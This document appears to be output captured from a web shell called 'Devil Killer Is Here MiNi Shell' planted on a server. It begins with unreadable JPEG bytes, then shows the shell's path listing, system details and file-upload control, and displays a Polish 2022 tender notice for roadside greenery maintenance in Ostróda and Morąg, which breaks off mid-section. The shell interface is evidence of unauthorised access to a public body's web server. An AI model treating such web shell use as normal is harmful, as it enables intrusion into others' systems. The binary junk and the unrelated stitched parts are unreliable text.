JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20220310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20220310/0008165102-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Utrzymanie zieleni na terenie działania Zarządu Dróg Powiatowych w Ostródzie na rok 2022” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Ostródzie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510751190</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grunwaldzka 62A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ostróda</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">14-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">basia_dt@zdp.ostroda.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zdp.ostroda.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Utrzymanie zieleni na terenie działania Zarządu Dróg Powiatowych w Ostródzie na rok 2022” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-77c105b8-a04c-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00081651</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00037969/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Utrzymanie zieleni</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/proceeding/preview/584220 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/proceeding/preview/584220</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Sposób sporządzenia dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz informacji lub oświadczeń musi być zgody z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452).<br/>2. Szczegółowe informacje dotyczące wymagań technicznych i organizacyjnych dot. korespondencji elektronicznej znajdują się w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowe zasady dotyczące RODO- § 37 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegółowe zasady dotyczące RODO- § 37 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.2610.7.2022.BŻ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część Nr 1: „Koszenie traw i chwastów, pielęgnacja żywopłotów oraz pielęgnacja klombów w m. Ostróda”<br/>1. Zakres zamówienia, wymagania wykonania i odbioru wykonania prac:<br/>1) Koszenie traw i chwastów<br/>a) Koszenie traw i chwastów wraz z niezwłocznym uprzątnięciem pokosu <br/>i uporządkowaniem terenu (sprzątnięcie papierów, butelek, puszek i innych zanieczyszczeń zalegających na koszonym obszarze) w pasie drogowym w ciągach ulic powiatowych powinno być wykonywane pięciokrotnie w sezonie (maj- wrzesień), pierwsze w okresie wiosennym (maj). Rozpoczęcie i zakończenie pierwszego koszenia traw i chwastów powinno być wykonane w takim okresie, aby nie dopuścić do wysypu nasion chwastów w wyniku ich przekwitnięcia. Najbardziej miarodajnym okresem pierwszego koszenia traw jest okres drugiej połowy maja, przy czym termin rozpoczęcia będzie wskazany przez Kierownika Obwodu Drogowego nr 1 w Ostródzie lub Majstra Obwodu Drogowego nr 1 w Ostródzie. Kolejne koszenia będą rozpoczynać się w czerwcu, lipcu, sierpniu i wrześniu w miejscach i terminach wskazanych przez Kierownika Obwodu Drogowego nr 1 w Ostródzie lub Majstra Obwodu Drogowego nr 1 w Ostródzie. <br/>b) W pierwszej kolejności powinny być koszone trawy i chwasty na koronie drogi, a w szczególności występujące na:<br/>- pasach dzielących,<br/>- wysepkach i trawnikach,<br/>- poboczach,<br/>- pod barierami, oraz w miejscach mających zasadniczy wpływ na wizualny wygląd drogi. Wysokość trawy po skoszeniu powinna być nie większa niż 5 cm.<br/>c) Należy zwracać uwagę, aby trawa i chwasty nie powodowały ograniczeń widoczności i nie zasłaniały urządzeń drogowych (np. barier, znaków) co może stworzyć zagrożenia dla ruchu drogowego lub utrudnić drożność rowów odwadniających. Wycięcie traw i chwastów w miejscach niedostępnych i częściowo obsadzonych wykonuje się kosiarkami żyłkowymi równolegle z głównym koszeniem. Dopuszcza się koszenie w tych miejscach traw, chwastów i jednorocznych samosiewów kosą.<br/>d) W zależności od potrzeb dopuszcza się koszenie niektórych obszarów częściej niż pięć razy, ale ogólna powierzchnia koszonego obszaru nie może przekroczyć pierwotnie założonej. Zakres terenów zielonych podlegający koszeniu zawiera tabela nr 1. Zamawiający może każdorazowo zmniejszyć ilość metrów kwadratowych podlegających koszeniu w danym miesiącu, bądź zwiększyć ilość koszeń w ciągach niektórych ulic- w zależności od potrzeb. Ilość metrów kwadratowych podlegających koszeniu w danym miesiącu nie może przekroczyć ilości podanej w tabeli nr 1.<br/>e) Czas wykonania jednorazowego koszenia zakresu wynosi 7-14 dni kalendarzowych (kryterium oceny oferty). Wykonawca otrzyma wynagrodzenie, liczone po cenach jednostkowych, za faktycznie wykonaną pracę. Koszenie przy sprzyjających warunkach atmosferycznych (brak opadów) musi odbywać się codziennie. Każdorazowe przerwanie prac z powodu opadów deszczu oraz każdorazowe ich wznowienie musi być potwierdzone Zamawiającemu informacją mailową (OD1). Nie wykonanie całego podanego zakres u koszenia (przy sprzyjających warunkach atmosferycznych) w określonym czasie spowoduje naliczenie kar umownych w wysokości ceny jednostkowej (netto) za 1 metr kwadratowy pomnożonej razy 5, za każdy nieskoszony metr kwadratowy. Potwierdzeniem wykonania zakresu koszenia wraz z ewentualnym określeniem ilości metrów nie wykonanych będzie protokół odbioru częściowego sporządzony w dniu następnym po upływie terminu wykonania prac. Wykonawca zobowiązany jest do wyznaczenia pracownika sprawującego kontrole nad sprawnym prowadzeniem prac porządkowych. Pracownik ten zobowiązany jest stawić się na telefoniczne wezwanie Zamawiającego do przeprowadzenia wspólnej kontroli, w miejsce wskazane przez Zamawiającego.<br/>W przypadku niestawienia się przedstawiciela Wykonawcy na telefoniczne wezwanie Zamawiającego w określonym miejscu i czasie, Zamawiający przeprowadzi kontrolę samodzielnie.<br/><br/>Tabela nr 1<br/>L.p.	Numer ulicy	Nazwa ulicy	Powierzchnia m2<br/>1	1243N	ul. Czarnieckiego	1 772,00<br/>2	3032N	ul. 11 Listopada	9 413,00<br/>3	3047N	ul. Sienkiewicza	384,00<br/>4	3012N	Ul. Grunwaldzka 13 000,00<br/>5	3015N	ul. Kopernika 661,00<br/>6	3058N	Ul. Żeromskiego	829,00<br/>7	3055N	Ul. Warmińska 984,00<br/>8	3005N	Ul. Chrobrego 6 774,00<br/>9	3052N	Ul. 21 Stycznia 3 850,00<br/>10	3026N	Ul. Jana Pawła II	434,00<br/>11	3035N	Ul. Pieniężnego 2 476,00<br/>12	3031N	Ul. Wyszyńskiego 716,00<br/>13	3029N	Ul. Mickiewicza 743,00<br/>14	3053N	Ul. Szosa Elbląska 18 151,00<br/>15	3018N	ul. 3 Maja 1 768,00<br/>16	3033N	Ul. Parkowa 6 082,00<br/>17	3034N	Ul. Partyzantów 2 065,00<br/>18	1961N	Ul. Jaracza	1 395,00<br/>19	1245N	Ul. Olsztyńska 7 256,00<br/>20	3010N	Ul. Gizewiusza 828,00<br/>21	1230N	Ul. Plebiscytowa 2 830,00<br/>22	3046N	Ul. Słowackiego 1 727,00<br/>23	3050N	Ul. Stapińskiego 596,00<br/>24	3105N	ul. Jagiełły razem z rondem Solidarności 19 841,00<br/>25	3037N	Ul. Piłsudzkiego	196,00<br/>26	3049N	Ul. Sportowa	191,00<br/>27	3051N	Ul. Drwęcka 1 000,00<br/>28	3011N	Ul. Graniczna	5 662,00<br/>29	3041N	Ul. Pułaskiego	81,00<br/>30	3015N	Ul. Kopernika	660,00<br/>31	3045N	Ul. Spokojna	2 639,00<br/>32	3058	Ul. Żeromskiego 829,00<br/>33	3008N	Ul. Dominika Savio	52,00<br/> Razem:	115 885,00<br/><br/>2) Pielęgnacja żywopłotów<br/>a) Podczas cięcia pielęgnacyjnego ścina się w linii prostej ok. 10-15 cm nowo wyrośniętych pędów. Pozwala to zapewnić odpowiednią wysokość żywopłotu oraz tempo wzrostu. Gałęzie żywopłotu można przycinać lekko lub mocniej. Zależy to od kondycji żywopłotu.<br/>b) Uprzątnąć teren po wykonywanych pracach (np. gałęzie, liście itp.).<br/>c) Cięcie żywopłotu odbywać się będzie dwa razy w ciągu okresu wegetacyjnego (maj- wrzesień).<br/>d) Żywopłot znajduje się przy ulicy Jagiełły, długość żywopłotu- 100 mb.<br/>e) Czas wykonania pielęgnacji żywopłotów (całego zakresu) wynosi 7 dni kalendarzowych. Nie wykonanie całego podanego zakres pielęgnacji żywopłotu w tym czasie spowoduje naliczenie kar umownych w wysokości ceny jednostkowej (netto) za 1 metr bieżący pomnożonej razy 5, za każdy nie zrobiony metr bieżący żywopłotu. Potwierdzeniem wykonania prac będzie protokół odbioru częściowego prac. Wykonawca zobowiązany jest do wyznaczenia pracownika sprawującego kontrole nad sprawnym prowadzeniem prac porządkowych. Pracownik ten zobowiązany jest stawić się na telefoniczne wezwanie Zamawiającego do przeprowadzenia wspólnej kontroli, w miejsce wskazane przez Zamawiającego. W przypadku niestawienia się przedstawiciela Wykonawcy na telefoniczne wezwanie Zamawiającego w określonym miejscu i czasie, Zamawiający przeprowadzi kontrolę samodzielnie.<br/>3) Pielęgnacja klombów<br/>a) Pielęgnacja klombów polegać ma na odchwaszczaniu nasadzeń na klombach, usuwaniu roślin uschniętych oraz usunięcia innych zanieczyszczeń (sprzątnięcie papierów, butelek, puszek itp.). Prace odbywać się będą trzy razy w sezonie (maj- wrzesień). Usunięte chwasty i inne zanieczyszczenia wykonawca usunie na własny koszt.<br/>b) Lokalizacja oraz ilość klombów znajduje się w tabeli nr 2.<br/>c) Czas wykonania pielęgnacji klombów (całego zakresu) wynosi 14 dni kalendarzowych. Nie wykonanie całego podanego zakres pielęgnacji klombów w tym czasie spowoduje naliczenie kar umownych w wysokości ceny jednostkowej (netto) za 1 metr kwadratowy pomnożonej razy 5, za każdy nie zrobiony metr kwadratowy klombów. Potwierdzeniem wykonania prac będzie protokół odbioru częściowego prac. Wykonawca zobowiązany jest do wyznaczenia pracownika sprawującego kontrole nad sprawnym prowadzeniem prac porządkowych. Pracownik ten zobowiązany jest stawić się na telefoniczne wezwanie Zamawiającego do przeprowadzenia wspólnej kontroli, w miejsce wskazane przez Zamawiającego. W przypadku niestawienia się przedstawiciela Wykonawcy na telefoniczne wezwanie Zamawiającego w określonym miejscu i czasie, Zamawiający przeprowadzi kontrolę samodzielnie.<br/><br/>Tabela nr 2<br/>Lp	Lokalizacja	Powierzchnia klombów m2<br/>1	Skrzyżowanie Grunwaldzka/Jagiełły	120<br/>2	Skrzyżowanie Grunwaldzka/Drwęcka	150<br/>3	Skrzyżowanie Czarnieckiego/Jana Pawła II 60<br/>4	Skrzyżowanie 11 Listopada/Pieniężnego	82<br/>5	Ciąg ulicy Czarnieckiego	300<br/>	Razem	712<br/><br/>2. Prace o których mowa w ust. 1, 2 i 3 odbywać się będą każdorazowo na pisemne zgłoszenie Zamawiającego (e-mail), rozpoczęcie prac nastąpi w terminie do 2 dni od zgłoszenia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77340000-5 - Usługi okrzesywania drzew oraz przycinania żywopłotów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za najkorzystniejszą, w każdej części odrębnie zostanie uznana oferta, która uzyska największą łączną ilość punktów. Ilość punktów za poszczególne kryteria zostanie zsumowana i będzie stanowić końcową ocenę oferty. Punkty w każdym z kryteriów będą wyliczone z dokładnością do dwóch miejsc po przecinku.2. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.3. Oferty oceniane będą przez komisję przetargową.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) czas wykonania jednorazowego koszenia przekazanego zakresu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część Nr 2: „Koszenie traw i chwastów w m. Morąg”<br/>1) Koszenie traw i chwastów<br/>a) Koszenie traw i chwastów wraz z niezwłocznym uprzątnięciem pokosu i uporządkowaniem terenu (sprzątnięcie papierów, butelek, puszek i innych zanieczyszczeń zalegających na koszonym obszarze) w pasie drogowym w ciągach ulic powiatowych powinno być wykonywane pięciokrotnie w sezonie (maj- wrzesień), pierwsze w okresie wiosennym (maj). Rozpoczęcie i zakończenie pierwszego koszenia traw i chwastów powinno być wykonane w takim okresie, aby nie dopuścić do wysypu nasion chwastów w wyniku ich przekwitnięcia. Najbardziej miarodajnym okresem pierwszego koszenia traw jest okres drugiej połowy maja, przy czym termin rozpoczęcia będzie wskazany przez Kierownika Obwodu Drogowego nr 2 w Morągu lub Majstra Obwodu Drogowego nr 2 w Morągu. Kolejne koszenia będą rozpoczynać się w czerwcu, lipcu, sierpniu i wrześniu w miejscach i terminach wskazanych przez Kierownika Obwodu Drogowego nr 2 w Morągu lub Majstra Obwodu Drogowego nr 2 w Morągu. <br/>b) W pierwszej kolejności powinny być koszone trawy i chwasty na koronie drogi, a w szczególności występujące na:<br/>- pasach dzielących,<br/>- wysepkach i trawnikach,<br/>- poboczach,<br/>- pod barierami, oraz w miejscach mających zasadniczy wpływ na wizualny wygląd drogi. Wysokość trawy po skoszeniu powinna być nie większa niż 5 cm.<br/>c) Należy zwracać uwagę, aby trawa i chwasty nie powodowały ograniczeń widoczności <br/>i nie zasłaniały urządzeń drogowych (np. barier, znaków) co może stworzyć zagrożenia dla ruchu drogowego lub utrudnić drożność rowów odwadniających. Wycięcie traw <br/>i chwastów w miejscach niedostępnych i częściowo obsadzonych wykonuje się kosiarkami żyłkowymi równolegle z głównym koszeniem. Dopuszcza się koszenie w tych miejscach traw, chwastów i jednorocznych samosiewów kosą.<br/>d) W zależności od potrzeb dopuszcza się koszenie niektórych obszarów częściej niż pięć razy, ale ogólna powierzchnia koszonego obszaru nie może przekroczyć pierwotnie założonej. Zakres terenów zielonych podlegający koszeniu zawiera tabela nr 3. Zamawiający może każdorazowo zmniejszyć ilość metrów kwadratowych podlegających koszeniu w danym miesiącu, bądź zwiększyć ilość koszeń w ciągach niektórych ulic- w zależności od potrzeb. Ilość metrów kwadratowych podlegających koszeniu w danym miesiącu nie może przekroczyć ilości podanej w tabeli nr 3.<br/>e) Czas wykonania jednorazowego koszenia zakresu wynosi 5-10 dni kalendarzowych (kryterium oceny oferty). Wykonawca otrzyma wynagrodzenie, liczone po cenach jednostkowych, za faktycznie wykonaną pracę. Koszenie przy sprzyjających warunkach atmosferycznych (brak opadów) musi odbywać się codziennie. Każdorazowe przerwanie prac z powodu opadów deszczu oraz każdorazowe ich wznowienie musi być potwierdzone Zamawiającemu informacją mailową ( OD2). Nie wykonanie całego podanego zakres u koszenia (przy sprzyjających warunkach atmosferycznych) w określonym czasie spowoduje naliczenie kar umownych w wysokości ceny jednostkowej (netto) za 1 metr kwadratowy pomnożonej razy 5, za każdy nieskoszony metr kwadratowy. Potwierdzeniem wykonania zakresu koszenia wraz z ewentualnym określeniem ilości metrów nie wykonanych będzie protokół odbioru częściowego sporządzony w dniu następnym po upływie terminu wykonania prac. Wykonawca zobowiązany jest do wyznaczenia pracownika sprawującego kontrole nad sprawnym prowadzeniem prac porządkowych. Pracownik ten zobowiązany jest stawić się na telefoniczne wezwanie Zamawiającego do przeprowadzenia wspólnej kontroli, w miejsce wskazane przez Zamawiającego.<br/>W przypadku niestawienia się przedstawiciela Wykonawcy na telefoniczne wezwanie Zamawiającego w określonym miejscu i czasie, Zamawiający przeprowadzi kontrolę samodzielnie.<br/><br/>Tabela nr 3<br/>Lp.	Numer ulicy	Nazwa ulicy	Powierzchnia m2<br/>1	1180N	Wróblewskiego 4395<br/>2	3073N	Leśna	12092<br/>3	3076N	Mickiewicza	3676<br/>4	3082N	Sienkiewicza	3398<br/>5	3086N	Pułaskiego	2362<br/> Razem	25923<br/><br/>2. Prace o których mowa w ust. 1 odbywać się będą każdorazowo na zgłoszenie pisemne Zamawiającego (e-mail), rozpoczęcie prac nastąpi w terminie do 2 dni od zgłoszenia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77340000-5 - Usługi okrzesywania drzew oraz przycinania żywopłotów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) 